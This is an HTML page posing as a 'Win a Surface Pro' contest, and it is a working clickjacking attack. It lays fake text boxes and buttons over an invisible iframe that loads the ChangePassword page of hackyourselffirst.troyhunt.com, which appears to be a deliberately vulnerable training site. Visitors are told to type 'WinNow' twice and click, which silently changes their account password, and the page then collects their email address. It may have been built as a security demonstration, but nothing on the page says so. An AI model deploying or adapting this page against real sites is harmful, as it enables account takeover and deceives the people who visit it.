<!DOCTYPE html>
<html>
<head>
  <title>Win a Surface Pro!!!</title>
</head>
<body style="text-align: center;">

  <div style="position: absolute; text-align: center; width: 100%;">
    <h1 style="font-size: 1.7em;">Want to win a Surface Pro? Of course you do!</h1>
    <p>
      In the two boxes below, just type &quot;WinNow&quot; then click &quot;I wanna win!&quot;. Don't worry if you don't see the text appear, you can still be a winner!!!
    </p>
	
	<p>
	  After that, enter your email address and hit &quot;Enter!&quot;
	</p>

    <p>
      <img src="/Images/SurfacePro.jpg" style="height: 150px;" />
    </p>
  </div>

  <div style="position: absolute; text-align: center; width: 100%; top: 300px;">
    <input type="text" style="width: 215px; height: 24px; margin-right: 28px;" />
  </div>

  <div style="position: absolute; text-align: center; width: 100%; top: 375px;">
    <input type="text" style="width: 215px; height: 24px; margin-right: 28px;" />
  </div>

  <div style="position: absolute; text-align: center; width: 100%; top: 422px;">
    <input type="submit" value="I wanna win!" style="font-size: 1.4em; margin-right: 108px;" />
  </div>

  <form action="/WinSurfacePro" method="POST">

    <div style="position: absolute; text-align: center; width: 100%; top: 500px;">
      Your email:
      <input type="text" style="width: 215px; height: 24px; margin-right: 100px;" name="Email" />
    </div>

    <div style="position: absolute; text-align: center; width: 100%; top: 550px;">
      <input type="submit" value="Enter!" style="font-size: 1.4em; margin-right: 168px;" />
    </div>

  </form>

  <iframe style="opacity: 0.0;" height="480" width="270" scrolling="no" src="https://hackyourselffirst.troyhunt.com/Account/ChangePassword"></iframe>

</body>
</html>
